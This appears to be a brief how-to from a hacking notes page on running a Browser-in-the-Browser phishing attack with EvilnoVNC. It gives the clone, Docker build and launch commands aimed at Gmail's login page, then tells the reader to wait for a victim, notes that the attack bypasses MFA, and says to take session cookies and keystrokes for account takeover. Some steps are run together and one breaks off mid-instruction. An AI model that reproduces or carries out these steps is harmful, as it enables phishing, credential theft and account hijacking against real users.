Browser-in-the-Browser BitB attack
Steps
1) Clone the EvilnoVNC tool
git clone https://github.com/JoelGMSec/EvilnoVNC2) Setup tool
cd EvilnoVNCsudo chown -R 103 Downloads3) Deploy the EvilnoVNC phishing environment as a container
sudo docker build -t joelgmsec/evilnovnc .4) Launch EvilnoVNC with Targeted Phishing Page
sudo chmod +x *
sudo ./start.sh 1920x1080x24 https://mail.google.com5) Wait for the victim to fall for our attack! (Our attack even Bypasses MFA)
6) You can check the victim's actions in real-time view by browsing on our localhost.
7) Next, session cookies are extracted from our own browser and imports them into Chromium for full access without needing to phish artifacts, code injections, or traffic proxying.
8) In Chromium, visit
9) Retrieve cookies and keystrokes
Last updated